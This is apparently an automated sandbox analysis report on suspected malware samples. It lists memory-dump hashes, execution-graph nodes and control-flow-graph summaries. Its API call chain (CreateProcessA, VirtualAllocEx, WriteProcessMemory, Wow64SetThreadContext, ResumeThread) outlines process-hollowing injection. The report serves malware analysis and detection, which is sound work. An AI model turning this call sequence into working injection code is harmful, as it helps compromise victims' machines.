                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                              • Instruction Fuzzy Hash: 9911E172504240CFDB02CF44D5C4B56BF71FB88324F24C6A9D9490B25BC33AE85ACBA2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2062979337.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_137d000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                              • Instruction ID: 4dceb4eadb7237492a726d93b80aa62521879b5a56c4eb73da81259a5fdc7781
                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                              • Instruction Fuzzy Hash: AF11BB75504280DFDB12CF54C5C4B15BFB1FF84228F28C6ADD9494B296C33AD40ACB62
                              Memory Dump Source
                              • Source File: 00000000.00000002.2062860498.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_136d000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 40bc623848d733b1e800acb96b447df11e12ecb5d2d9d272a84c07512f1dfb61
                              • Instruction ID: 8719bae918d1613a5ca2f90524956975ce717ef309c4d39dd90ae87d3583b59f
                              • Opcode Fuzzy Hash: 40bc623848d733b1e800acb96b447df11e12ecb5d2d9d272a84c07512f1dfb61
                              • Instruction Fuzzy Hash: 45012B31204384DAE7209F99CD84B67FF9CEF45328F18C52AED490A28AC27D9800CA72
                              Memory Dump Source
                              • Source File: 00000000.00000002.2062860498.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_136d000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c52b16560d27c159d0fa4f6814fcd05837ef0a183e1234ecec17cc3e1f8a28c3
                              • Instruction ID: 51f60e4322eb3eb38ce4af3e5d13f5f01b4374c95fefd0c59ee601d22ef162a5
                              • Opcode Fuzzy Hash: c52b16560d27c159d0fa4f6814fcd05837ef0a183e1234ecec17cc3e1f8a28c3
                              • Instruction Fuzzy Hash: CCF062715043849EE7119E1AD888B62FFACEF85634F18C45AED485A29AC2799844CAB1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ac0a088747121b4756147b6b438b149d5922b0a027a80ca7e9ba2d8182a9b3bd
                              • Instruction ID: 3da54dfb1608b2c02cdca2772c06364cc5a9a86926b125617f132f86b14a1538
                              • Opcode Fuzzy Hash: ac0a088747121b4756147b6b438b149d5922b0a027a80ca7e9ba2d8182a9b3bd
                              • Instruction Fuzzy Hash: 13D1C1B17017058FDB26DB79C4647AEB7FAAF88744F14886DD106DB290DB34E902CBA1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0be77c0cb41019c8afc873c0542104db9bae3136b4f7bb9ecde9d22e3fb66d38
                              • Instruction ID: f2e20931f817ae6aabd0a836d5b3f6ecd3091aee08dcc6add8d3fb43b54867c0
                              • Opcode Fuzzy Hash: 0be77c0cb41019c8afc873c0542104db9bae3136b4f7bb9ecde9d22e3fb66d38
                              • Instruction Fuzzy Hash: B4E1F9B4E001198FCB14DFA9C580AAEFBF2FF89345F248169D415AB35AD731A941CF61
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 32baaf7840290f66db0b2241fdddfcdb401442c098b42deafc862681f9e8265d
                              • Instruction ID: 651b15b43b5d733a50d0223636c3807114fff9acb86067680a8195fa34197df4
                              • Opcode Fuzzy Hash: 32baaf7840290f66db0b2241fdddfcdb401442c098b42deafc862681f9e8265d
                              • Instruction Fuzzy Hash: CBE11BB4E001598FCB14DFA9C580AAEFBF2FF89345F248169E415AB35AD730A941CF61
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a4b96af90d2df159951b503231805acf4d53707ae8647292f88a7d660c794ce2
                              • Instruction ID: 854c38d782cd17424133304fb8a11f780960ce5d4f0862490c47f2392168782c
                              • Opcode Fuzzy Hash: a4b96af90d2df159951b503231805acf4d53707ae8647292f88a7d660c794ce2
                              • Instruction Fuzzy Hash: 1DE119B4E001198FCB14DFA9C580AAEFBB2FF89345F248169E515AB35AD731A941CF60
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 07858e54ae7de476f91ac400513a7c5a48617d6e866e7fd013d56208e0f289b2
                              • Instruction ID: a71f768b00ad1c7d517ce6bb39687aec240480ce154451ae2d55dc545725241e
                              • Opcode Fuzzy Hash: 07858e54ae7de476f91ac400513a7c5a48617d6e866e7fd013d56208e0f289b2
                              • Instruction Fuzzy Hash: 21E10BB4E002198FCB14DFA9C580AAEFBB2FF89345F648169D415AB35AD730A941CF61
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eac67035fdfae1a9b48464f408a8b93901d697f36c3568b12781f2f949aa3864
                              • Instruction ID: 518282996d22d511d3596d7d5defd4e68d6e05b49d5c4f2d7e96d6c7d4a15db4
                              • Opcode Fuzzy Hash: eac67035fdfae1a9b48464f408a8b93901d697f36c3568b12781f2f949aa3864
                              • Instruction Fuzzy Hash: CDE1FCB4E001598FCB14DFA9C580AAEFBF2FF89345F248169E815A735AD730A941CF61
                              Memory Dump Source
                              • Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4a03413407951047299ce28a52ac06e41ed80a157379157dbfc28709ebdc8b55
                              • Instruction ID: 26a97448c60848d8c66e3d27ca48ade4be19fd5d3524ee4dde068674a8f58703
                              • Opcode Fuzzy Hash: 4a03413407951047299ce28a52ac06e41ed80a157379157dbfc28709ebdc8b55
                              • Instruction Fuzzy Hash: CFA14D32E002198FCF09DFB9C84459EBBB6FF84704B15856EE905AB265DB31ED15CB80
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1347fc7052956e9c93f37134c84c49a086beb767ba784e9d799b3b073cd55776
                              • Instruction ID: 26fc9e188a94a8d6188a39555022b9f6eb1138e2a6c02bbe675e6501ff7ec8d6
                              • Opcode Fuzzy Hash: 1347fc7052956e9c93f37134c84c49a086beb767ba784e9d799b3b073cd55776
                              • Instruction Fuzzy Hash: 3121C9B1D09628CBEB68CF6BC8043D9FAF7AFC9350F04C0AAC61CA6255DB341685CE01

                              Execution Graph

                              Execution Coverage:10%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:234
                              Total number of Limit Nodes:15
                              execution_graph 34757 6f9a038 34758 6f9a1c3 34757->34758 34760 6f9a05e 34757->34760 34760->34758 34761 6f93434 34760->34761 34762 6f9a2b8 PostMessageW 34761->34762 34763 6f9a324 34762->34763 34763->34760 34962 d94668 34963 d9467a 34962->34963 34964 d94686 34963->34964 34968 d94778 34963->34968 34973 d93e28 34964->34973 34966 d946a5 34969 d9479d 34968->34969 34977 d94888 34969->34977 34981 d94878 34969->34981 34974 d93e33 34973->34974 34989 d95d1c 34974->34989 34976 d96ffb 34976->34966 34978 d948af 34977->34978 34979 d9498c 34978->34979 34985 d944b0 34978->34985 34982 d948af 34981->34982 34983 d9498c 34982->34983 34984 d944b0 CreateActCtxA 34982->34984 34983->34983 34984->34983 34986 d95918 CreateActCtxA 34985->34986 34988 d959db 34986->34988 34988->34988 34990 d95d27 34989->34990 34993 d95d3c 34990->34993 34992 d972b5 34992->34976 34994 d95d47 34993->34994 34997 d95d6c 34994->34997 34996 d9739a 34996->34992 34998 d95d77 34997->34998 35001 d95d9c 34998->35001 35000 d9748d 35000->34996 35002 d95da7 35001->35002 35004 d989eb 35002->35004 35008 d9ac90 35002->35008 35003 d98a29 35003->35000 35004->35003 35012 d9cd90 35004->35012 35017 d9cd81 35004->35017 35022 d9b0c1 35008->35022 35026 d9b0d0 35008->35026 35009 d9aca6 35009->35004 35013 d9cdb1 35012->35013 35014 d9cdd5 35013->35014 35034 d9d339 35013->35034 35038 d9d348 35013->35038 35014->35003 35018 d9cdb1 35017->35018 35019 d9cdd5 35018->35019 35020 d9d339 GetModuleHandleW 35018->35020 35021 d9d348 GetModuleHandleW 35018->35021 35019->35003 35020->35019 35021->35019 35023 d9b0d0 35022->35023 35029 d9b1c8 35023->35029 35024 d9b0df 35024->35009 35028 d9b1c8 GetModuleHandleW 35026->35028 35027 d9b0df 35027->35009 35028->35027 35030 d9b1fc 35029->35030 35031 d9b1d9 35029->35031 35030->35024 35031->35030 35032 d9b400 GetModuleHandleW 35031->35032 35033 d9b42d 35032->35033 35033->35024 35035 d9d355 35034->35035 35036 d9d38f 35035->35036 35042 d9d170 35035->35042 35036->35014 35039 d9d355 35038->35039 35040 d9d38f 35039->35040 35041 d9d170 GetModuleHandleW 35039->35041 35040->35014 35041->35040 35043 d9d17b 35042->35043 35045 d9dca0 35043->35045 35046 d9d28c 35043->35046 35045->35045 35047 d9d297 35046->35047 35048 d95d9c GetModuleHandleW 35047->35048 35049 d9dd0f 35048->35049 35049->35045 34764 6f971e1 34765 6f972c2 34764->34765 34766 6f971eb 34764->34766 34769 6f98cd8 34766->34769 34786 6f98ce8 34766->34786 34770 6f98ce8 34769->34770 34771 6f98d26 34770->34771 34803 6f99484 34770->34803 34808 6f99382 34770->34808 34813 6f99ac2 34770->34813 34817 6f99283 34770->34817 34822 6f994e0 34770->34822 34827 6f9930d 34770->34827 34832 6f99889 34770->34832 34837 6f99009 34770->34837 34843 6f99395 34770->34843 34848 6f99351 34770->34848 34853 6f9933f 34770->34853 34858 6f9919c 34770->34858 34864 6f994fb 34770->34864 34869 6f99546 34770->34869 34771->34765 34787 6f98d02 34786->34787 34788 6f98d26 34787->34788 34789 6f994fb 2 API calls 34787->34789 34790 6f9919c 2 API calls 34787->34790 34791 6f9933f 2 API calls 34787->34791 34792 6f99351 2 API calls 34787->34792 34793 6f99395 2 API calls 34787->34793 34794 6f99009 2 API calls 34787->34794 34795 6f99889 2 API calls 34787->34795 34796 6f9930d 2 API calls 34787->34796 34797 6f994e0 2 API calls 34787->34797 34798 6f99283 2 API calls 34787->34798 34799 6f99ac2 2 API calls 34787->34799 34800 6f99382 2 API calls 34787->34800 34801 6f99484 2 API calls 34787->34801 34802 6f99546 2 API calls 34787->34802 34788->34765 34789->34788 34790->34788 34791->34788 34792->34788 34793->34788 34794->34788 34795->34788 34796->34788 34797->34788 34798->34788 34799->34788 34800->34788 34801->34788 34802->34788 34804 6f9948a 34803->34804 34805 6f99262 34804->34805 34873 6f99f98 34804->34873 34878 6f99f88 34804->34878 34805->34771 34810 6f9938f 34808->34810 34809 6f998f2 34891 6f96929 34810->34891 34895 6f96930 34810->34895 34899 6f96360 34813->34899 34903 6f96359 34813->34903 34814 6f99adc 34818 6f99287 34817->34818 34820 6f96929 WriteProcessMemory 34818->34820 34821 6f96930 WriteProcessMemory 34818->34821 34819 6f99992 34820->34819 34821->34819 34823 6f9949b 34822->34823 34824 6f99262 34823->34824 34825 6f99f98 2 API calls 34823->34825 34826 6f99f88 2 API calls 34823->34826 34824->34771 34825->34823 34826->34823 34828 6f999d3 34827->34828 34907 6f99d88 34828->34907 34912 6f99d78 34828->34912 34829 6f999ec 34833 6f9949b 34832->34833 34834 6f99262 34833->34834 34835 6f99f98 2 API calls 34833->34835 34836 6f99f88 2 API calls 34833->34836 34834->34771 34835->34833 34836->34833 34839 6f9904b 34837->34839 34838 6f990ee 34838->34771 34839->34838 34917 6f96bb8 34839->34917 34921 6f96bac 34839->34921 34844 6f993a7 34843->34844 34925 6f96868 34844->34925 34929 6f96870 34844->34929 34845 6f997e4 34849 6f9935a 34848->34849 34851 6f96929 WriteProcessMemory 34849->34851 34852 6f96930 WriteProcessMemory 34849->34852 34850 6f992c7 34850->34771 34851->34850 34852->34850 34854 6f99287 34853->34854 34856 6f96929 WriteProcessMemory 34854->34856 34857 6f96930 WriteProcessMemory 34854->34857 34855 6f99992 34856->34855 34857->34855 34860 6f990d1 34858->34860 34859 6f990ee 34859->34771 34860->34859 34862 6f96bb8 CreateProcessA 34860->34862 34863 6f96bac CreateProcessA 34860->34863 34861 6f99237 34862->34861 34863->34861 34865 6f99262 34864->34865 34866 6f9949b 34864->34866 34865->34771 34866->34865 34867 6f99f98 2 API calls 34866->34867 34868 6f99f88 2 API calls 34866->34868 34867->34866 34868->34866 34933 6f96a19 34869->34933 34937 6f96a20 34869->34937 34870 6f99568 34874 6f99fad 34873->34874 34883 6f962a9 34874->34883 34887 6f962b0 34874->34887 34875 6f99fc0 34875->34804 34879 6f99f98 34878->34879 34881 6f962a9 ResumeThread 34879->34881 34882 6f962b0 ResumeThread 34879->34882 34880 6f99fc0 34880->34804 34881->34880 34882->34880 34884 6f962b0 ResumeThread 34883->34884 34886 6f96321 34884->34886 34886->34875 34888 6f962f0 ResumeThread 34887->34888 34890 6f96321 34888->34890 34890->34875 34892 6f96930 WriteProcessMemory 34891->34892 34894 6f969cf 34892->34894 34894->34809 34896 6f96978 WriteProcessMemory 34895->34896 34898 6f969cf 34896->34898 34898->34809 34900 6f963a5 Wow64SetThreadContext 34899->34900 34902 6f963ed 34900->34902 34902->34814 34904 6f96360 Wow64SetThreadContext 34903->34904 34906 6f963ed 34904->34906 34906->34814 34908 6f99d9d 34907->34908 34910 6f96359 Wow64SetThreadContext 34908->34910 34911 6f96360 Wow64SetThreadContext 34908->34911 34909 6f99db3 34909->34829 34910->34909 34911->34909 34913 6f99d9d 34912->34913 34915 6f96359 Wow64SetThreadContext 34913->34915 34916 6f96360 Wow64SetThreadContext 34913->34916 34914 6f99db3 34914->34829 34915->34914 34916->34914 34918 6f96c41 CreateProcessA 34917->34918 34920 6f96e03 34918->34920 34922 6f96b76 34921->34922 34922->34921 34923 6f96da6 CreateProcessA 34922->34923 34924 6f96e03 34923->34924 34926 6f96870 VirtualAllocEx 34925->34926 34928 6f968ed 34926->34928 34928->34845 34930 6f968b0 VirtualAllocEx 34929->34930 34932 6f968ed 34930->34932 34932->34845 34934 6f96a20 ReadProcessMemory 34933->34934 34936 6f96aaf 34934->34936 34936->34870 34938 6f96a6b ReadProcessMemory 34937->34938 34940 6f96aaf 34938->34940 34940->34870 35050 d9d460 35051 d9d4a6 35050->35051 35055 d9d62f 35051->35055 35058 d9d640 35051->35058 35052 d9d593 35056 d9d66e 35055->35056 35061 d9b0b4 35055->35061 35056->35052 35059 d9b0b4 DuplicateHandle 35058->35059 35060 d9d66e 35059->35060 35060->35052 35062 d9d6a8 DuplicateHandle 35061->35062 35063 d9d73e 35062->35063 35063->35056 34941 71f2430 34942 71f246a 34941->34942 34943 71f24fb 34942->34943 34944 71f24e6 34942->34944 34946 71f08a4 2 API calls 34943->34946 34949 71f08a4 34944->34949 34948 71f250a 34946->34948 34951 71f08af 34949->34951 34950 71f24f1 34951->34950 34953 71f2e50 34951->34953 34955 71f2e42 34953->34955 34955->34953 34956 71f2e76 34955->34956 34957 71f2e9f CreateIconFromResourceEx 34955->34957 34959 71f08ec 34955->34959 34956->34950 34958 71f2f1e 34957->34958 34958->34950 34960 71f2ea0 CreateIconFromResourceEx 34959->34960 34961 71f2f1e 34960->34961 34961->34955

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 783 6f96bac-6f96bb4 784 6f96b76-6f96b7d call 6f96b82 783->784 785 6f96bb6-6f96c4d 783->785 784->783 788 6f96c4f-6f96c59 785->788 789 6f96c86-6f96ca6 785->789 788->789 790 6f96c5b-6f96c5d 788->790 796 6f96ca8-6f96cb2 789->796 797 6f96cdf-6f96d0e 789->797 791 6f96c5f-6f96c69 790->791 792 6f96c80-6f96c83 790->792 794 6f96c6b 791->794 795 6f96c6d-6f96c7c 791->795 792->789 794->795 795->795 798 6f96c7e 795->798 796->797 799 6f96cb4-6f96cb6 796->799 803 6f96d10-6f96d1a 797->803 804 6f96d47-6f96d9f 797->804 798->792 801 6f96cd9-6f96cdc 799->801 802 6f96cb8-6f96cc2 799->802 801->797 805 6f96cc4 802->805 806 6f96cc6-6f96cd5 802->806 803->804 808 6f96d1c-6f96d1e 803->808 816 6f96da6-6f96e01 CreateProcessA 804->816 805->806 806->806 807 6f96cd7 806->807 807->801 809 6f96d41-6f96d44 808->809 810 6f96d20-6f96d2a 808->810 809->804 812 6f96d2c 810->812 813 6f96d2e-6f96d3d 810->813 812->813 813->813 815 6f96d3f 813->815 815->809 817 6f96e0a-6f96e90 816->817 818 6f96e03-6f96e09 816->818 828 6f96ea0-6f96ea4 817->828 829 6f96e92-6f96e96 817->829 818->817 831 6f96eb4-6f96eb8 828->831 832 6f96ea6-6f96eaa 828->832 829->828 830 6f96e98 829->830 830->828 833 6f96ec8-6f96ecc 831->833 834 6f96eba-6f96ebe 831->834 832->831 835 6f96eac 832->835 837 6f96ede-6f96ee5 833->837 838 6f96ece-6f96ed4 833->838 834->833 836 6f96ec0 834->836 835->831 836->833 839 6f96efc 837->839 840 6f96ee7-6f96ef6 837->840 838->837 842 6f96efd 839->842 840->839 842->842
                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F96DEE
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: d0e7d8f5907427110fb7d97f3a43885c00bdb0482738c7fae2dacd3d67d661fc
                              • Instruction ID: de72953c6c4c7f43289bd149f1a4cd0c1e3bccc5b8057ac03a918fd9f083b4d2
                              • Opcode Fuzzy Hash: d0e7d8f5907427110fb7d97f3a43885c00bdb0482738c7fae2dacd3d67d661fc
                              • Instruction Fuzzy Hash: 28A15871D002198FEF64DF69C9417AEBBB2FF48304F14856AE818E7280DB759985CFA1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 843 6f96bb8-6f96c4d 845 6f96c4f-6f96c59 843->845 846 6f96c86-6f96ca6 843->846 845->846 847 6f96c5b-6f96c5d 845->847 853 6f96ca8-6f96cb2 846->853 854 6f96cdf-6f96d0e 846->854 848 6f96c5f-6f96c69 847->848 849 6f96c80-6f96c83 847->849 851 6f96c6b 848->851 852 6f96c6d-6f96c7c 848->852 849->846 851->852 852->852 855 6f96c7e 852->855 853->854 856 6f96cb4-6f96cb6 853->856 860 6f96d10-6f96d1a 854->860 861 6f96d47-6f96e01 CreateProcessA 854->861 855->849 858 6f96cd9-6f96cdc 856->858 859 6f96cb8-6f96cc2 856->859 858->854 862 6f96cc4 859->862 863 6f96cc6-6f96cd5 859->863 860->861 865 6f96d1c-6f96d1e 860->865 874 6f96e0a-6f96e90 861->874 875 6f96e03-6f96e09 861->875 862->863 863->863 864 6f96cd7 863->864 864->858 866 6f96d41-6f96d44 865->866 867 6f96d20-6f96d2a 865->867 866->861 869 6f96d2c 867->869 870 6f96d2e-6f96d3d 867->870 869->870 870->870 872 6f96d3f 870->872 872->866 885 6f96ea0-6f96ea4 874->885 886 6f96e92-6f96e96 874->886 875->874 888 6f96eb4-6f96eb8 885->888 889 6f96ea6-6f96eaa 885->889 886->885 887 6f96e98 886->887 887->885 890 6f96ec8-6f96ecc 888->890 891 6f96eba-6f96ebe 888->891 889->888 892 6f96eac 889->892 894 6f96ede-6f96ee5 890->894 895 6f96ece-6f96ed4 890->895 891->890 893 6f96ec0 891->893 892->888 893->890 896 6f96efc 894->896 897 6f96ee7-6f96ef6 894->897 895->894 899 6f96efd 896->899 897->896 899->899
                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F96DEE
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: 64997946fe363c443e6b8c5772de02605e8729d6b0507925af13cf8130f7c0be
                              • Instruction ID: afbd9a067f9eac1e511a08f5d5c9738d2878f82b76216353a5c2a38ae4b58b25
                              • Opcode Fuzzy Hash: 64997946fe363c443e6b8c5772de02605e8729d6b0507925af13cf8130f7c0be
                              • Instruction Fuzzy Hash: 96914771D002198FEF64DF69C941BADBBB2BF48304F14856AE818E7240DB759985CFA1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 900 d9b1c8-d9b1d7 901 d9b1d9-d9b1e6 call d99c38 900->901 902 d9b203-d9b207 900->902 907 d9b1e8 901->907 908 d9b1fc 901->908 903 d9b209-d9b213 902->903 904 d9b21b-d9b25c 902->904 903->904 911 d9b269-d9b277 904->911 912 d9b25e-d9b266 904->912 955 d9b1ee call d9b450 907->955 956 d9b1ee call d9b460 907->956 908->902 914 d9b279-d9b27e 911->914 915 d9b29b-d9b29d 911->915 912->911 913 d9b1f4-d9b1f6 913->908 918 d9b338-d9b3f8 913->918 916 d9b289 914->916 917 d9b280-d9b287 call d9ae80 914->917 919 d9b2a0-d9b2a7 915->919 921 d9b28b-d9b299 916->921 917->921 950 d9b3fa-d9b3fd 918->950 951 d9b400-d9b42b GetModuleHandleW 918->951 922 d9b2a9-d9b2b1 919->922 923 d9b2b4-d9b2bb 919->923 921->919 922->923 925 d9b2c8-d9b2d1 call d9ae90 923->925 926 d9b2bd-d9b2c5 923->926 931 d9b2de-d9b2e3 925->931 932 d9b2d3-d9b2db 925->932 926->925 934 d9b301-d9b30e 931->934 935 d9b2e5-d9b2ec 931->935 932->931 941 d9b331-d9b337 934->941 942 d9b310-d9b32e 934->942 935->934 936 d9b2ee-d9b2fe call d9aea0 call d9aeb0 935->936 936->934 942->941 950->951 952 d9b42d-d9b433 951->952 953 d9b434-d9b448 951->953 952->953 955->913 956->913
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00D9B41E
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2109322857.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_d90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: 68d26b32491163db3b144a3302aa364860c44ed17d76ad941aae5873d1ccc7a5
                              • Instruction ID: 6e82ee2d5089fd1123cc461404080b831885b04bcdb69877c73fc71612a35269
                              • Opcode Fuzzy Hash: 68d26b32491163db3b144a3302aa364860c44ed17d76ad941aae5873d1ccc7a5
                              • Instruction Fuzzy Hash: 9C714870A00B058FDB24DF6AE14575ABBF1FF88314F04892ED48AD7A50DB35E945CBA4

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 957 71f2e50-71f2e5a 958 71f2e5c-71f2e65 call 71f08ec 957->958 959 71f2e70-71f2e75 957->959 963 71f2e6a-71f2e6c 958->963 961 71f2e8a-71f2e9d 959->961 962 71f2e76-71f2e87 959->962 966 71f2e9f-71f2f1c CreateIconFromResourceEx 961->966 967 71f2e42-71f2e4e 961->967 963->959 968 71f2f1e-71f2f24 966->968 969 71f2f25-71f2f42 966->969 967->957 968->969
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2117086589.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_71f0000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: CreateFromIconResource
                              • String ID:
                              • API String ID: 3668623891-0
                              • Opcode ID: e2c48945bf053e3b09e6e28349f3438f309d619cc8d84467b52b72c776d4cc5f
                              • Instruction ID: a689fd7075440006255ad2fce922dd560903771548312e8440b9cd59d89b667c
                              • Opcode Fuzzy Hash: e2c48945bf053e3b09e6e28349f3438f309d619cc8d84467b52b72c776d4cc5f
                              • Instruction Fuzzy Hash: 2231B0B58053899FCB12DFA9D844ADEBFF4EF0A310F14809AE954A7262C3359854CBA1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 972 d95a84-d95b14
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2109322857.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_d90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 13d93461fd3302ee3105020d8bc4714a81bd386800d6bf4b654ec3b8ed489357
                              • Instruction ID: 80b90cca31e4c320b354e5addc283f2499ab75f0e4238cdff0c058f2b7f64219
                              • Opcode Fuzzy Hash: 13d93461fd3302ee3105020d8bc4714a81bd386800d6bf4b654ec3b8ed489357
                              • Instruction Fuzzy Hash: A9310171804A48CFDF12CFA8D8457EDBBB1EF45314F1482AAC009AB259C776A94ACF21

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 975 d944b0-d959d9 CreateActCtxA 979 d959db-d959e1 975->979 980 d959e2-d95a3c 975->980 979->980 987 d95a4b-d95a4f 980->987 988 d95a3e-d95a41 980->988 989 d95a51-d95a5d 987->989 990 d95a60 987->990 988->987 989->990 991 d95a61 990->991 991->991
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 00D959C9
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2109322857.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_d90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 5cbae6058b0a3697d85ed931c8f6b0bb8b6946b5d1986a6f248534eaa1720110
                              • Instruction ID: 4fa4a8e9ca5f2e6669390d844b913b2849f6efc4e8b4673d772d398746ab90de
                              • Opcode Fuzzy Hash: 5cbae6058b0a3697d85ed931c8f6b0bb8b6946b5d1986a6f248534eaa1720110
                              • Instruction Fuzzy Hash: BD41F2B0C0071DCBDB25DFAAC884B9DBBF6BF48304F20806AD408AB255DB756945CFA0
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 00D959C9
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2109322857.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_d90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 05541f839a20a458c57c1576d87ebb6b8fe518cb8cf5632a2540971760ae0533
                              • Instruction ID: 31d0b27d74c22c1fc1dce3a6a7e6244d0f3608a22c5651ec804264e7ee0db0c6
                              • Opcode Fuzzy Hash: 05541f839a20a458c57c1576d87ebb6b8fe518cb8cf5632a2540971760ae0533
